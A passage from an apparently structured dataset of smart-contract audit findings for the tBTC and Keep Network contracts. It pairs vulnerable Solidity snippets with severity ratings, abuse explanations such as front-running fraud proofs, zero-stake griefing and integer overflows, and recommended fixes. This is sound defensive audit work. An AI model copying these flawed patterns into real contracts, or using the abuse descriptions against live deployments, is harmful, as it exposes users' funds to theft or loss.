\\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, \"public key not set or not 64-bytes long\");\\n\\n \\_d.signingGroupPubkeyX = \\_publicKey.slice(0, 32).toBytes32();\\n \\_d.signingGroupPubkeyY = \\_publicKey.slice(32, 32).toBytes32();\\n require(\\_d.signingGroupPubkeyY != bytes32(0) && \\_d.signingGroupPubkeyX != bytes32(0), \"Keep returned bad pubkey\");\\n \\_d.fundingProofTimerStart = block.timestamp;\\n\\n \\_d.setAwaitingBTCFundingProof();\\n \\_d.logRegisteredPubkey(\\n \\_d.signingGroupPubkeyX,\\n \\_d.signingGroupPubkeyY);\\n}\\n```\\n -bitcoin-spv - SPV proofs do not support transactions with larger numbers of inputs and outputs PendingчhighчThere is no explicit restriction on the number of inputs and outputs a Bitcoin transaction can have - as long as the transaction fits into a block. The number of inputs and outputs in a transaction is denoted by a leading “varint” - a variable length integer. In `BTCUtils.validateVin` and `BTCUtils.validateVout`, the value of this varint is restricted to under `0xFD`, or 253:\\n```\\n/// @notice Checks that the vin passed up is properly formatted\\n/// @dev Consider a vin with a valid vout in its scriptsig\\n/// @param \\_vin Raw bytes length-prefixed input vector\\n/// @return True if it represents a validly formatted vin\\nfunction validateVin(bytes memory \\_vin) internal pure returns (bool) {\\n uint256 \\_offset = 1;\\n uint8 \\_nIns = uint8(\\_vin.slice(0, 1)[0]);\\n\\n // Not valid if it says there are too many or no inputs\\n if (\\_nIns >= 0xfd || \\_nIns == 0) {\\n return false;\\n }\\n```\\n\\nTransactions that include more than 252 inputs or outputs will not pass this validation, leading to some legitimate deposits being rejected by the tBTC system.\\nThe 252-item limit exists in a few forms throughout the system, outside of the aforementioned `BTCUtils.validateVin` and BTCUtils.validateVout:\\nBTCUtils.determineOutputLength:\\n```\\n/// @notice Determines the length of an output\\n/// @dev 5 types: WPKH, WSH, PKH, SH, and OP\\_RETURN\\n/// @param \\_output The output\\n/// @return The length indicated by the prefix, error if invalid length\\nfunction determineOutputLength(bytes memory \\_output) internal pure returns (uint256) {\\n uint8 \\_len = uint8(\\_output.slice(8, 1)[0]);\\n require(\\_len < 0xfd, \"Multi-byte VarInts not supported\");\\n\\n return \\_len + 8 + 1; // 8 byte value, 1 byte for \\_len itself\\n}\\n```\\n\\nDepositUtils.findAndParseFundingOutput:\\n```\\nfunction findAndParseFundingOutput(\\n DepositUtils.Deposit storage \\_d,\\n bytes memory \\_txOutputVector,\\n uint8 \\_fundingOutputIndex\\n) public view returns (bytes8) {\\n```\\n\\nDepositUtils.validateAndParseFundingSPVProof:\\n```\\nfunction validateAndParseFundingSPVProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public view returns (bytes8 \\_valueBytes, bytes memory \\_utxoOutpoint){\\n```\\n\\nDepositFunding.provideFraudBTCFundingProof:\\n```\\nfunction provideFraudBTCFundingProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public returns (bool) {\\n```\\n\\nDepositFunding.provideBTCFundingProof:\\n```\\nfunction provideBTCFundingProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public returns (bool) {\\n```\\n\\nDepositLiquidation.provideSPVFraudProof:\\n```\\nfunction provideSPVFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n uint8 \\_targetInputIndex,\\n bytes memory \\_bitcoinHeaders\\n) public {\\n```\\nчResolution\\nThe client provided the following statement:\\nBenchmarks and takeaways are being tracked in issue https://github.com/keep-network/tbtc/issues/556.\\nIncorporate varint parsing in `BTCUtils.validateVin` and `BTCUtils.validateVout`. Ensure that other components of the system reflect the removal of the 252-item limit.чч```\\n/// @notice Checks that the vin passed up is properly formatted\\n/// @dev Consider a vin with a valid vout in its scriptsig\\n/// @param \\_vin Raw bytes length-prefixed input vector\\n/// @return True if it represents a validly formatted vin\\nfunction validateVin(bytes memory \\_vin) internal pure returns (bool) {\\n uint256 \\_offset = 1;\\n uint8 \\_nIns = uint8(\\_vin.slice(0, 1)[0]);\\n\\n // Not valid if it says there are too many or no inputs\\n if (\\_nIns >= 0xfd || \\_nIns == 0) {\\n return false;\\n }\\n```\\n -bitcoin-spv - multiple integer under-/overflowsчhighчThe bitcoin-spv library allows for multiple integer under-/overflows while processing or converting potentially untrusted or user-provided data.\\n`uint8` underflow `uint256(uint8(_e - 3))`\\nNote: `_header[75]` will throw consuming all gas if out of bounds while the majority of the library usually uses `slice(start, 1)` to handle this more gracefully.\\n```\\n/// @dev Target is a 256 bit number encoded as a 3-byte mantissa and 1 byte exponent\\n/// @param \\_header The header\\n/// @return The target threshold\\nfunction extractTarget(bytes memory \\_header) internal pure returns (uint256) {\\n bytes memory \\_m = \\_header.slice(72, 3);\\n uint8 \\_e = uint8(\\_header[75]);\\n uint256 \\_mantissa = bytesToUint(reverseEndianness(\\_m));\\n uint \\_exponent = \\_e - 3;\\n\\n return \\_mantissa \\* (256 \\*\\* \\_exponent);\\n}\\n```\\n\\n`uint8` overflow `uint256(uint8(_len + 8 + 1))`\\nNote: might allow a specially crafted output to return an invalid determineOutputLength <= 9.\\nNote: while type `VarInt` is implemented for inputs, it is not for the output length.\\n```\\n/// @dev 5 types: WPKH, WSH, PKH, SH, and OP\\_RETURN\\n/// @param \\_output The output\\n/// @return The length indicated by the prefix, error if invalid length\\nfunction determineOutputLength(bytes memory \\_output) internal pure returns (uint256) {\\n uint8 \\_len = uint8(\\_output.slice(8, 1)[0]);\\n require(\\_len < 0xfd, \"Multi-byte VarInts not supported\");\\n\\n return \\_len + 8 + 1; // 8 byte value, 1 byte for \\_len itself\\n}\\n```\\n\\n`uint8` underflow `uint256(uint8(extractOutputScriptLen(_output)[0]) - 2)`\\n```\\n/// @dev Determines type by the length prefix and validates format\\n/// @param \\_output The output\\n/// @return The hash committed to by the pk\\_script, or null for errors\\nfunction extractHash(bytes memory \\_output) internal pure returns (bytes memory) {\\n if (uint8(\\_output.slice(9, 1)[0]) == 0) {\\n uint256 \\_len = uint8(extractOutputScriptLen(\\_output)[0]) - 2;\\n // Check for maliciously formatted witness outputs\\n if (uint8(\\_output.slice(10, 1)[0]) != uint8(\\_len)) {\\n return hex\"\";\\n }\\n return \\_output.slice(11, \\_len);\\n } else {\\n bytes32 \\_tag = \\_output.keccak256Slice(8, 3);\\n```\\n\\n`BytesLib` input validation multiple start+length overflow\\nNote: multiple occurrences. should check `start+length > start && bytes.length >= start+length`\\n```\\nfunction slice(bytes memory \\_bytes, uint \\_start, uint \\_length) internal pure returns (bytes memory res) {\\n require(\\_bytes.length >= (\\_start + \\_length), \"Slice out of bounds\");\\n```\\n\\n`BytesLib` input validation multiple start overflow\\n```\\nfunction toUint(bytes memory \\_bytes, uint \\_start) internal pure returns (uint256) {\\n require(\\_bytes.length >= (\\_start + 32), \"Uint conversion out of bounds.\");\\n```\\n\\n```\\nfunction toAddress(bytes memory \\_bytes, uint \\_start) internal pure returns (address) {\\n require(\\_bytes.length >= (\\_start + 20), \"Address conversion out of bounds.\");\\n```\\n\\n```\\nfunction slice(bytes memory \\_bytes, uint \\_start, uint \\_length) internal pure returns (bytes memory res) {\\n require(\\_bytes.length >= (\\_start + \\_length), \"Slice out of bounds\");\\n```\\n\\n```\\nfunction keccak256Slice(bytes memory \\_bytes, uint \\_start, uint \\_length) pure internal returns (bytes32 result) {\\n require(\\_bytes.length >= (\\_start + \\_length), \"Slice out of bounds\");\\n```\\nчWe believe that a general-purpose parsing and verification library for bitcoin payments should be very strict when processing untrusted user input. With strict we mean, that it should rigorously validate provided input data and only proceed with the processing of the data if it is within a safe-to-use range for the method to return valid results. Relying on the caller to provide pre-validate data can be unsafe especially if the caller assumes that proper input validation is performed by the library.\\nGiven the risk profile for this library, we recommend a conservative approach that balances security instead of gas efficiency without relying on certain calls or instructions to throw on invalid input.\\nFor this issue specifically, we recommend proper input validation and explicit type expansion where necessary to prevent values from wrapping or processing data for arguments that are not within a safe-to-use range.чч```\\n/// @dev Target is a 256 bit number encoded as a 3-byte mantissa and 1 byte exponent\\n/// @param \\_header The header\\n/// @return The target threshold\\nfunction extractTarget(bytes memory \\_header) internal pure returns (uint256) {\\n bytes memory \\_m = \\_header.slice(72, 3);\\n uint8 \\_e = uint8(\\_header[75]);\\n uint256 \\_mantissa = bytesToUint(reverseEndianness(\\_m));\\n uint \\_exponent = \\_e - 3;\\n\\n return \\_mantissa \\* (256 \\*\\* \\_exponent);\\n}\\n```\\n -tbtc - Unreachable state LIQUIDATION_IN_PROGRESSчhighчAccording to the specification (overview, states, version 2020-02-06), a deposit can be in one of two liquidation_in_progress states.\\nLIQUIDATION_IN_PROGRESS\\nLIQUIDATION_IN_PROGRESS Liquidation due to undercollateralization or an abort has started Automatic (on-chain) liquidation was unsuccessful\\nFRAUD_LIQUIDATION_IN_PROGRESS\\nFRAUD_LIQUIDATION_IN_PROGRESS Liquidation due to fraud has started Automatic (on-chain) liquidation was unsuccessful\\nHowever, `LIQUIDATION_IN_PROGRESS` is unreachable and instead, `FRAUD_LIQUIDATION_IN_PROGRESS` is always called. This means that all non-fraud state transitions end up in the fraud liquidation path and will perform actions as if fraud was detected even though it might be caused by an undercollateralized notification or courtesy timeout.\\n`startSignerAbortLiquidation` transitions to `FRAUD_LIQUIDATION_IN_PROGRESS` on non-fraud events `notifyUndercollateralizedLiquidation` and `notifyCourtesyTimeout`\\n```\\n/// @notice Starts signer liquidation due to abort or undercollateralization\\n/// @dev We first attempt to liquidate on chain, then by auction\\n/// @param \\_d deposit storage pointer\\nfunction startSignerAbortLiquidation(DepositUtils.Deposit storage \\_d) internal {\\n \\_d.logStartedLiquidation(false);\\n // Reclaim used state for gas savings\\n \\_d.redemptionTeardown();\\n \\_d.seizeSignerBonds();\\n\\n \\_d.liquidationInitiated = block.timestamp; // Store the timestamp for auction\\n \\_d.liquidationInitiator = msg.sender;\\n \\_d.setFraudLiquidationInProgress();\\n}\\n```\\nчVerify state transitions and either remove `LIQUIDATION_IN_PROGRESS` if it is redundant or fix the state transitions for non-fraud liquidations.\\nNote that Deposit states can be simplified by removing redundant states by setting a flag (e.g. fraudLiquidation) in the deposit instead of adding a state to track the fraud liquidation path.\\nAccording to the specification, we assume the following state transitions are desired:\\n`LIQUIDATION_IN_PROGRESS`\\nIn case of liquidation due to undercollateralization or abort, the remaining bond value is split 50-50 between the account which triggered the liquidation and the signers.\\n`FRAUD_LIQUIDATION_IN_PROGRESS`\\nIn case of liquidation due to fraud, the remaining bond value in full goes to the account which triggered the liquidation by proving fraud.чч```\\n/// @notice Starts signer liquidation due to abort or undercollateralization\\n/// @dev We first attempt to liquidate on chain, then by auction\\n/// @param \\_d deposit storage pointer\\nfunction startSignerAbortLiquidation(DepositUtils.Deposit storage \\_d) internal {\\n \\_d.logStartedLiquidation(false);\\n // Reclaim used state for gas savings\\n \\_d.redemptionTeardown();\\n \\_d.seizeSignerBonds();\\n\\n \\_d.liquidationInitiated = block.timestamp; // Store the timestamp for auction\\n \\_d.liquidationInitiator = msg.sender;\\n \\_d.setFraudLiquidationInProgress();\\n}\\n```\\n -tbtc - various deposit state transitions can be front-run (e.g. fraud proofs, timeouts) Won't FixчhighчAn entity that can provide proof for fraudulent ECDSA signatures or SPV proofs in the liquidation flow is rewarded with part of the deposit contract ETH value.\\nSpecification: Liquidation Any signer bond left over after the deposit owner is compensated is distributed to the account responsible for reporting the misbehavior (for fraud) or between the signers and the account that triggered liquidation (for collateralization issues).\\nHowever, the methods under which proof is provided are not protected from front-running allowing anyone to observe transactions to provideECDSAFraudProof/ `provideSPVFraudProof` and submit the same proofs with providing a higher gas value.\\nPlease note that a similar issue exists for timeout states providing rewards for calling them out (i.e. they set the `liquidationInitiator` address).\\n`provideECDSAFraudProof` verifies the fraudulent proof\\n`r,s,v,signedDigest` appear to be the fraudulent signature. `_preimage` is the correct value.\\n```\\n/// @param \\_preimage The sha256 preimage of the digest\\nfunction provideECDSAFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes memory \\_preimage\\n) public {\\n require(\\n !\\_d.inFunding() && !\\_d.inFundingFailure(),\\n \"Use provideFundingECDSAFraudProof instead\"\\n );\\n require(\\n !\\_d.inSignerLiquidation(),\\n \"Signer liquidation already in progress\"\\n );\\n require(!\\_d.inEndState(), \"Contract has halted\");\\n require(submitSignatureFraud(\\_d, \\_v, \\_r, \\_s, \\_signedDigest, \\_preimage), \"Signature is not fraud\");\\n startSignerFraudLiquidation(\\_d);\\n}\\n```\\n\\n`startSignerFraudLiquidation` sets the address that provides the proof as the beneficiary\\n```\\nfunction provideFundingECDSAFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes memory \\_preimage\\n) public {\\n require(\\n \\_d.inAwaitingBTCFundingProof(),\\n \"Signer fraud during funding flow only available while awaiting funding\"\\n );\\n\\n bool \\_isFraud = \\_d.submitSignatureFraud(\\_v, \\_r, \\_s, \\_signedDigest, \\_preimage);\\n require(\\_isFraud, \"Signature is not fraudulent\");\\n \\_d.logFraudDuringSetup();\\n\\n // If the funding timeout has elapsed, punish the funder too!\\n if (block.timestamp > \\_d.fundingProofTimerStart + TBTCConstants.getFundingTimeout()) {\\n address(0).transfer(address(this).balance); // Burn it all down (fire emoji)\\n \\_d.setFailedSetup();\\n } else {\\n /\\* NB: This is reuse of the variable \\*/\\n \\_d.fundingProofTimerStart = block.timestamp;\\n \\_d.setFraudAwaitingBTCFundingProof();\\n }\\n}\\n```\\n\\n`purchaseSignerBondsAtAuction` pays out the funds\\n```\\n uint256 contractEthBalance = address(this).balance;\\n address payable initiator = \\_d.liquidationInitiator;\\n\\n if (initiator == address(0)){\\n initiator = address(0xdead);\\n }\\n if (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n }\\n}\\n```\\nчFor fraud proofs, it should be required that the reporter uses a commit/reveal scheme to lock in a proof in one block, and reveal the details in another.чч```\\n/// @param \\_preimage The sha256 preimage of the digest\\nfunction provideECDSAFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes memory \\_preimage\\n) public {\\n require(\\n !\\_d.inFunding() && !\\_d.inFundingFailure(),\\n \"Use provideFundingECDSAFraudProof instead\"\\n );\\n require(\\n !\\_d.inSignerLiquidation(),\\n \"Signer liquidation already in progress\"\\n );\\n require(!\\_d.inEndState(), \"Contract has halted\");\\n require(submitSignatureFraud(\\_d, \\_v, \\_r, \\_s, \\_signedDigest, \\_preimage), \"Signature is not fraud\");\\n startSignerFraudLiquidation(\\_d);\\n}\\n```\\n -tbtc - Anyone can emit log events due to missing access controlчhighчAccess control for `DepositLog` is not implemented. `DepositLog` is inherited by `TBTCSystem` and its functionality is usually consumed by `Deposit` contracts to emit log events on `TBTCSystem`. Due to the missing access control, anyone can emit log events on `TBTCSystem`. Users, client-software or other components that rely on these events might be tricked into performing actions that were not authorized by the system.\\n```\\nfunction approvedToLog(address \\_caller) public pure returns (bool) {\\n /\\* TODO: auth via system \\*/\\n \\_caller;\\n return true;\\n}\\n```\\nчLog events are typically initiated by the Deposit contract. Make sure only Deposit contracts deployed by an approved factory can emit logs on TBTCSystem.чч```\\nfunction approvedToLog(address \\_caller) public pure returns (bool) {\\n /\\* TODO: auth via system \\*/\\n \\_caller;\\n return true;\\n}\\n```\\n -DKGResultVerification.verify unsafe packing in signed dataчmediumч`DKGResultVerification.verify` allows the sender to arbitrarily move bytes between `groupPubKey` and misbehaved:\\n```\\nbytes32 resultHash = keccak256(abi.encodePacked(groupPubKey, misbehaved));\\n```\\nчValidate the expected length of both and add a salt between the two.чч```\\nbytes32 resultHash = keccak256(abi.encodePacked(groupPubKey, misbehaved));\\n```\\n -keep-core - Service contract callbacks can be abused to call into other contractsчmediumч`KeepRandomBeaconServiceImplV1` allows senders to specify an arbitrary method and contract that will receive a callback once the beacon generates a relay entry:\\n```\\n/\\*\\*\\n \\* @dev Creates a request to generate a new relay entry, which will include\\n \\* a random number (by signing the previous entry's random number).\\n \\* @param callbackContract Callback contract address. Callback is called once a new relay entry has been generated.\\n \\* @param callbackMethod Callback contract method signature. String representation of your method with a single\\n \\* uint256 input parameter i.e. \"relayEntryCallback(uint256)\".\\n \\* @param callbackGas Gas required for the callback.\\n \\* The customer needs to ensure they provide a sufficient callback gas\\n \\* to cover the gas fee of executing the callback. Any surplus is returned\\n \\* to the customer. If the callback gas amount turns to be not enough to\\n \\* execute the callback, callback execution is skipped.\\n \\* @return An uint256 representing uniquely generated relay request ID. It is also returned as part of the event.\\n \\*/\\nfunction requestRelayEntry(\\n address callbackContract,\\n string memory callbackMethod,\\n uint256 callbackGas\\n) public nonReentrant payable returns (uint256) {\\n```\\n\\nOnce an operator contract receives the relay entry, it calls executeCallback:\\n```\\n/\\*\\*\\n \\* @dev Executes customer specified callback for the relay entry request.\\n \\* @param requestId Request id tracked internally by this contract.\\n \\* @param entry The generated random number.\\n \\* @return Address to receive callback surplus.\\n \\*/\\nfunction executeCallback(uint256 requestId, uint256 entry) public returns (address payable surplusRecipient) {\\n require(\\n \\_operatorContracts.contains(msg.sender),\\n \"Only authorized operator contract can call execute callback.\"\\n );\\n\\n require(\\n \\_callbacks[requestId].callbackContract != address(0),\\n \"Callback contract not found\"\\n );\\n\\n \\_callbacks[requestId].callbackContract.call(abi.encodeWithSignature(\\_callbacks[requestId].callbackMethod, entry));\\n\\n surplusRecipient = \\_callbacks[requestId].surplusRecipient;\\n delete \\_callbacks[requestId];\\n}\\n```\\n\\nArbitrary callbacks can be used to force the service contract to execute many functions within the keep contract system. Currently, the `KeepRandomBeaconOperator` includes an `onlyServiceContract` modifier:\\n```\\n/\\*\\*\\n \\* @dev Checks if sender is authorized.\\n \\*/\\nmodifier onlyServiceContract() {\\n require(\\n serviceContracts.contains(msg.sender),\\n \"Caller is not an authorized contract\"\\n );\\n \\_;\\n}\\n```\\n\\nThe functions it protects cannot be targeted by the aforementioned service contract callbacks due to Solidity's `CALLDATASIZE` checking. However, the presence of the modifier suggests that the service contract is expected to be a permissioned actor within some contracts.чStick to a constant callback method signature, rather than allowing users to submit an arbitrary string. An example is `__beaconCallback__(uint256)`.\\nConsider disallowing arbitrary callback destinations. Instead, rely on contracts making requests directly, and default the callback destination to `msg.sender`. Ensure the sender is not an EOA.чч```\\n/\\*\\*\\n \\* @dev Creates a request to generate a new relay entry, which will include\\n \\* a random number (by signing the previous entry's random number).\\n \\* @param callbackContract Callback contract address. Callback is called once a new relay entry has been generated.\\n \\* @param callbackMethod Callback contract method signature. String representation of your method with a single\\n \\* uint256 input parameter i.e. \"relayEntryCallback(uint256)\".\\n \\* @param callbackGas Gas required for the callback.\\n \\* The customer needs to ensure they provide a sufficient callback gas\\n \\* to cover the gas fee of executing the callback. Any surplus is returned\\n \\* to the customer. If the callback gas amount turns to be not enough to\\n \\* execute the callback, callback execution is skipped.\\n \\* @return An uint256 representing uniquely generated relay request ID. It is also returned as part of the event.\\n \\*/\\nfunction requestRelayEntry(\\n address callbackContract,\\n string memory callbackMethod,\\n uint256 callbackGas\\n) public nonReentrant payable returns (uint256) {\\n```\\n -tbtc - Disallow signatures with high-s values in DepositRedemption.provideRedemptionSignatureчmediumч`DepositRedemption.provideRedemptionSignature` is used by signers to publish a signature that can be used to redeem a deposit on Bitcoin. The function accepts a signature s value in the upper half of the secp256k1 curve:\\n```\\nfunction provideRedemptionSignature(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) public {\\n require(\\_d.inAwaitingWithdrawalSignature(), \"Not currently awaiting a signature\");\\n\\n // If we're outside of the signature window, we COULD punish signers here\\n // Instead, we consider this a no-harm-no-foul situation.\\n // The signers have not stolen funds. Most likely they've just inconvenienced someone\\n\\n // The signature must be valid on the pubkey\\n require(\\n \\_d.signerPubkey().checkSig(\\n \\_d.lastRequestedDigest,\\n \\_v, \\_r, \\_s\\n ),\\n \"Invalid signature\"\\n );\\n```\\n\\nAlthough `ecrecover` accepts signatures with these s values, they are no longer used in Bitcoin. As such, the signature will appear to be valid to the Ethereum smart contract, but will likely not be accepted on Bitcoin. If no users watching malleate the signature, the redemption process will likely enter a fee increase loop, incurring a cost on the deposit owner.чEnsure the passed-in s value is restricted to the lower half of the secp256k1 curve, as done in BondedECDSAKeep:\\n```\\n// Validate `s` value for a malleability concern described in EIP-2.\\n// Only signatures with `s` value in the lower half of the secp256k1\\n// curve's order are considered valid.\\nrequire(\\n uint256(\\_s) <=\\n 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0,\\n \"Malleable signature - s should be in the low half of secp256k1 curve's order\"\\n);\\n```\\nчч```\\nfunction provideRedemptionSignature(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) public {\\n require(\\_d.inAwaitingWithdrawalSignature(), \"Not currently awaiting a signature\");\\n\\n // If we're outside of the signature window, we COULD punish signers here\\n // Instead, we consider this a no-harm-no-foul situation.\\n // The signers have not stolen funds. Most likely they've just inconvenienced someone\\n\\n // The signature must be valid on the pubkey\\n require(\\n \\_d.signerPubkey().checkSig(\\n \\_d.lastRequestedDigest,\\n \\_v, \\_r, \\_s\\n ),\\n \"Invalid signature\"\\n );\\n```\\n -Consistent use of SafeERC20 for external tokensчmediumчUse `SafeERC20` features to interact with potentially broken tokens used in the system. E.g. `TokenGrant.receiveApproval()` is using `safeTransferFrom` while other contracts aren't.\\n`TokenGrant.receiveApproval` using `safeTransferFrom`\\n```\\ntoken.safeTransferFrom(\\_from, address(this), \\_amount);\\n```\\n\\n`TokenStaking.receiveApproval` not using `safeTransferFrom` while `safeTransfer` is being used.\\n```\\ntoken.transferFrom(\\_from, address(this), \\_value);\\n```\\n\\n```\\ntoken.safeTransfer(owner, amount);\\n```\\n\\n```\\ntoken.transfer(tattletale, tattletaleReward);\\n```\\n\\n`distributeERC20ToMembers` not using `safeTransferFrom`\\n```\\ntoken.transferFrom(\\n msg.sender,\\n tokenStaking.magpieOf(members[i]),\\n dividend\\n);\\n```\\nчConsistently use `SafeERC20` to support potentially broken tokens external to the system.чч```\\ntoken.safeTransferFrom(\\_from, address(this), \\_amount);\\n```\\n -Initialize implementations for proxy contracts and protect initialization methodsчmediumчIt should be avoided that the implementation for proxy contracts can be initialized by third parties. This can be the case if the `initialize` function is unprotected. Since the implementation contract is not meant to be used directly without a proxy delegate-calling it is recommended to protect the initialization method of the implementation by initializing on deployment.\\nChanging the proxies implementation (upgradeTo()) to a version that does not protect the initialization method may allow someone to front-run and initialize the contract if it is not done within the same transaction.\\n`KeepVendor` delegates to `KeepVendorImplV1`. The implementations initialization method is unprotected.\\n```\\n/// @notice Initializes Keep Vendor contract implementation.\\n/// @param registryAddress Keep registry contract linked to this contract.\\nfunction initialize(\\n address registryAddress\\n)\\n public\\n{\\n require(!initialized(), \"Contract is already initialized.\");\\n \\_initialized[\"BondedECDSAKeepVendorImplV1\"] = true;\\n registry = Registry(registryAddress);\\n}\\n```\\n\\n`KeepRandomBeaconServiceImplV1` and `KeepRandomBeaconServiceUpgradeExample`\\n```\\nfunction initialize(\\n uint256 priceFeedEstimate,\\n uint256 fluctuationMargin,\\n uint256 dkgContributionMargin,\\n uint256 withdrawalDelay,\\n address registry\\n)\\n public\\n{\\n require(!initialized(), \"Contract is already initialized.\");\\n \\_initialized[\"KeepRandomBeaconServiceImplV1\"] = true;\\n \\_priceFeedEstimate = priceFeedEstimate;\\n \\_fluctuationMargin = fluctuationMargin;\\n \\_dkgContributionMargin = dkgContributionMargin;\\n \\_withdrawalDelay = withdrawalDelay;\\n \\_pendingWithdrawal = 0;\\n \\_previousEntry = \\_beaconSeed;\\n \\_registry = registry;\\n \\_baseCallbackGas = 18845;\\n}\\n```\\n\\n`Deposit` is deployed via `cloneFactory` delegating to a `masterDepositAddress` in `DepositFactory`. The `masterDepositAddress` (Deposit) might be left uninitialized.\\n```\\ncontract DepositFactoryAuthority {\\n\\n bool internal \\_initialized = false;\\n address internal \\_depositFactory;\\n\\n /// @notice Set the address of the System contract on contract initialization\\n function initialize(address \\_factory) public {\\n require(! \\_initialized, \"Factory can only be initialized once.\");\\n\\n \\_depositFactory = \\_factory;\\n \\_initialized = true;\\n }\\n```\\nчInitialize unprotected implementation contracts in the implementation's constructor. Protect initialization methods from being called by unauthorized parties or ensure that deployment of the proxy and initialization is performed in the same transaction.чч```\\n/// @notice Initializes Keep Vendor contract implementation.\\n/// @param registryAddress Keep registry contract linked to this contract.\\nfunction initialize(\\n address registryAddress\\n)\\n public\\n{\\n require(!initialized(), \"Contract is already initialized.\");\\n \\_initialized[\"BondedECDSAKeepVendorImplV1\"] = true;\\n registry = Registry(registryAddress);\\n}\\n```\\n -keep-tecdsa - If caller sends more than is contained in the signer subsidy pool, the value is burnedчmediumчThe signer subsidy pool in `BondedECDSAKeepFactory` tracks funds sent to the contract. Each time a keep is opened, the subsidy pool is intended to be distributed to the members of the new keep:\\n```\\n// If subsidy pool is non-empty, distribute the value to signers but\\n// never distribute more than the payment for opening a keep.\\nuint256 signerSubsidy = subsidyPool < msg.value\\n ? subsidyPool\\n : msg.value;\\nif (signerSubsidy > 0) {\\n subsidyPool -= signerSubsidy;\\n keep.distributeETHToMembers.value(signerSubsidy)();\\n}\\n```\\n\\nThe tracking around subsidy pool increases is inconsistent, and can lead to sent value being burned. In the case that `subsidyPool` contains less Ether than is sent in `msg.value`, `msg.value` is unused and remains in the contract. It may or may not be added to `subsidyPool`, depending on the return status of the random beacon:\\n```\\n(bool success, ) = address(randomBeacon).call.gas(400000).value(msg.value)(\\n abi.encodeWithSignature(\\n \"requestRelayEntry(address,string,uint256)\",\\n address(this),\\n \"setGroupSelectionSeed(uint256)\",\\n callbackGas\\n )\\n);\\nif (!success) {\\n subsidyPool += msg.value; // beacon is busy\\n}\\n```\\nчRather than tracking the `subsidyPool` individually, simply distribute `this.balance` to each new keep's members.чч```\\n// If subsidy pool is non-empty, distribute the value to signers but\\n// never distribute more than the payment for opening a keep.\\nuint256 signerSubsidy = subsidyPool < msg.value\\n ? subsidyPool\\n : msg.value;\\nif (signerSubsidy > 0) {\\n subsidyPool -= signerSubsidy;\\n keep.distributeETHToMembers.value(signerSubsidy)();\\n}\\n```\\n -keep-core - TokenGrant and TokenStaking allow staking zero amount of tokens and front-runningчmediumчTokens are staked via the callback `receiveApproval()` which is normally invoked when calling `approveAndCall()`. The method is not restricting who can initiate the staking of tokens and relies on the fact that the token transfer to the `TokenStaking` contract is pre-approved by the owner, otherwise, the call would revert.\\nHowever, `receiveApproval()` allows the staking of a zero amount of tokens. The only check performed on the number of tokens transferred is, that the token holders balance covers the amount to be transferred. This check is both relatively weak - having enough balance does not imply that tokens are approved for transfer - and does not cover the fact that someone can call the method with a zero amount of tokens.\\nThis way someone could create an arbitrary number of operators staking no tokens at all. This passes the token balance check, `token.transferFrom()` will succeed and an operator struct with a zero stake and arbitrary values for `operator, from, magpie, authorizer` can be set. Finally, an event is emitted for a zero stake.\\nAn attacker could front-run calls to `receiveApproval` to block staking of a legitimate operator by creating a zero stake entry for the operator before she is able to. This vector might allow someone to permanently inconvenience an operator's address. To recover from this situation one could be forced to `cancelStake` terminating the zero stake struct in order to call the contract with the correct stake again.\\nThe same issue exists for `TokenGrant`.\\n```\\n/\\*\\*\\n \\* @notice Receives approval of token transfer and stakes the approved amount.\\n \\* @dev Makes sure provided token contract is the same one linked to this contract.\\n \\* @param \\_from The owner of the tokens who approved them to transfer.\\n \\* @param \\_value Approved amount for the transfer and stake.\\n \\* @param \\_token Token contract address.\\n \\* @param \\_extraData Data for stake delegation. This byte array must have the\\n \\* following values concatenated: Magpie address (20 bytes) where the rewards for participation\\n \\* are sent, operator's (20 bytes) address, authorizer (20 bytes) address.\\n \\*/\\nfunction receiveApproval(address \\_from, uint256 \\_value, address \\_token, bytes memory \\_extraData) public {\\n require(ERC20Burnable(\\_token) == token, \"Token contract must be the same one linked to this contract.\");\\n require(\\_value <= token.balanceOf(\\_from), \"Sender must have enough tokens.\");\\n require(\\_extraData.length == 60, \"Stake delegation data must be provided.\");\\n\\n address payable magpie = address(uint160(\\_extraData.toAddress(0)));\\n address operator = 